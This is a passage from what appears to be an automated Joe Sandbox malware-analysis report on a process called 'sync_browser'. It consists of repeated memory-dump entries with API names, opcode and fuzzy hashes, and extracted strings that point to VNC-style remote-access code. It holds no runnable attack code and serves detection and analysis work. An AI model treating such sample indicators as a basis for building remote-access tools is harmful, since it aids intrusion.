                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                    • String ID:
                                                    • API String ID: 1747828912-0
                                                    • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                    • Instruction ID: 1956cbdc35fe23ac20caf305c231001998988d41a61966f5be3af3cacf0a030a
                                                    • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                    • Instruction Fuzzy Hash: 2B115E72A2476297E7089F25E58056DBBA4FB88F90F90413BEB4943B54CF38E075CB50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                    • String ID:
                                                    • API String ID: 540623443-0
                                                    • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                    • Instruction ID: fcf4d7bd586ddd221bed2c0c68a9a29e4b2ed3315c853ae5df3fa9f339f9ae23
                                                    • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                    • Instruction Fuzzy Hash: D2113022A28A5587DB84EF65D5806BCB3A4FF88F88FC05036EE4E57654DF38D055C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Escape$Release
                                                    • String ID:
                                                    • API String ID: 2350829361-0
                                                    • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                    • Instruction ID: 73ccaa57763552d8c346daab7f8245911b6ad7127fd3c8b55883c9da7af37b00
                                                    • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                    • Instruction Fuzzy Hash: 6EF06D32B286518BE7649B34B955A2EF6A1FBC8B84F944136DE4A03E18CE3CD0118B04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _amsg_exit_getptd$_lock
                                                    • String ID:
                                                    • API String ID: 3670291111-0
                                                    • Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                    • Instruction ID: a78f9c97d494d13f2617831e8ba952a5410dcd3d6f5df83be91674266d558bb3
                                                    • Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                    • Instruction Fuzzy Hash: 9AF0E761E1A04697FA58BB61D441BBC9660AF54F58FD80176EE0C072D2DF2CA844D721
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htonl
                                                    • String ID: .$.
                                                    • API String ID: 2009864989-3769392785
                                                    • Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                    • Instruction ID: 6cf1cc8707a72c511c0b78cab4bc11a1e1722bcdf7dcb49e6e0a184761db146e
                                                    • Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                    • Instruction Fuzzy Hash: B641C151A0C2828BF725BA32985017EFAD09F51F5CFD86073EE6A862CACF3CD4058320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
                                                    • String ID: !UVNCDIR-
                                                    • API String ID: 2642416944-2720985186
                                                    • Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                    • Instruction ID: 02fe51dac09bd54c4d7bd31645cda148bf76d5d83f3cf4a29acaef122e95720c
                                                    • Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                    • Instruction Fuzzy Hash: A941B42161DAC182EB26AB20A5143FDA790FB89B84FC44132DE9D477C6DF3CD516C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_invalid_parameter_noinfo
                                                    • String ID: B
                                                    • API String ID: 2959964966-1255198513
                                                    • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                    • Instruction ID: 51835faa3753e52a2ea9de807875392a2fb38b5e7a28b471219c2a6d85f31df0
                                                    • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                    • Instruction Fuzzy Hash: FB316D32A196268AF711EF75A4405ACB7B4BB08BACFD84137EE1D53A99CF39D445C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_invalid_parameter_noinfo
                                                    • String ID: SecureVNC;0;0x%08x;%s
                                                    • API String ID: 2959964966-2465057312
                                                    • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                    • Instruction ID: f5e589dde085f7ba520d60da8d05c480a9fdacfb6471a84075e43c449b88dc1e
                                                    • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                    • Instruction Fuzzy Hash: 54219332B187518AE711EF61A8405ADB7A9BB08FACBD50137EE5C53B89CF39D441C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentDirectoryFileModuleName
                                                    • String ID: " -service
                                                    • API String ID: 3981628254-877726483
                                                    • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                    • Instruction ID: b316bf1d2b8dbe0b95b2cb7d874dae09489213e0286a14b4b17916c6ebfe9e75
                                                    • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                    • Instruction Fuzzy Hash: 7231A2116086C182EB25A720A8153BDBBA0FF99B94FC44337DAAC536D5DF3CE514C724
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_invalid_parameter_noinfo
                                                    • String ID: B
                                                    • API String ID: 2959964966-1255198513
                                                    • Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                    • Instruction ID: 27426049234094771ae11d218994f41d016f26ecb9e1db14b2e1b21a45679318
                                                    • Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                    • Instruction Fuzzy Hash: F1112E72A1978186E620AB55A44026DB6A0FB88FD8FD44232EF9D07B95CF3CD5408B15
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleNamePlaySound
                                                    • String ID: ding_dong.wav
                                                    • API String ID: 3032721342-215479118
                                                    • Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                    • Instruction ID: 2fad57b15090488ac688de6a8860764b07759bff642e73b289de594c7199c754
                                                    • Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                    • Instruction Fuzzy Hash: 84114F2161869592E7249B35E85176AA6A0FF88B64FC04337EEAC876D4DF3CD111C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                    • String ID: <
                                                    • API String ID: 2439412506-4251816714
                                                    • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                    • Instruction ID: 4d5feb8b831a55afa99573da4e4136008d014d651309140a5a0ab9098decadfd
                                                    • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                    • Instruction Fuzzy Hash: 97114922A1864186E7509B15F4107AEB660EBC8B48F945032EB8D07B59CF3CD956CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_invalid_parameter_noinfo
                                                    • String ID: I
                                                    • API String ID: 2959964966-3707901625
                                                    • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                    • Instruction ID: 8a09deb2859f3847de58758ffe47b467b2887eb128f746c79e3d891f4e63373d
                                                    • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                    • Instruction Fuzzy Hash: A511A072A0874086EB10AF52A54026DB7A4FB94FE4F984232EF9C07B95CF3CD5418B00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: getpeernameinet_ntoa
                                                    • String ID: <unavailable>
                                                    • API String ID: 1982201544-1096956887
                                                    • Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                    • Instruction ID: f625af3128cf5c8fe8adba06257ecab741b266a46b7193c47514e72188d2d2e6
                                                    • Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                    • Instruction Fuzzy Hash: 4D016D62A1968687EB50AB24E45526DB7A0FB88B88FC40432EE4E4B364DF3CD446CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
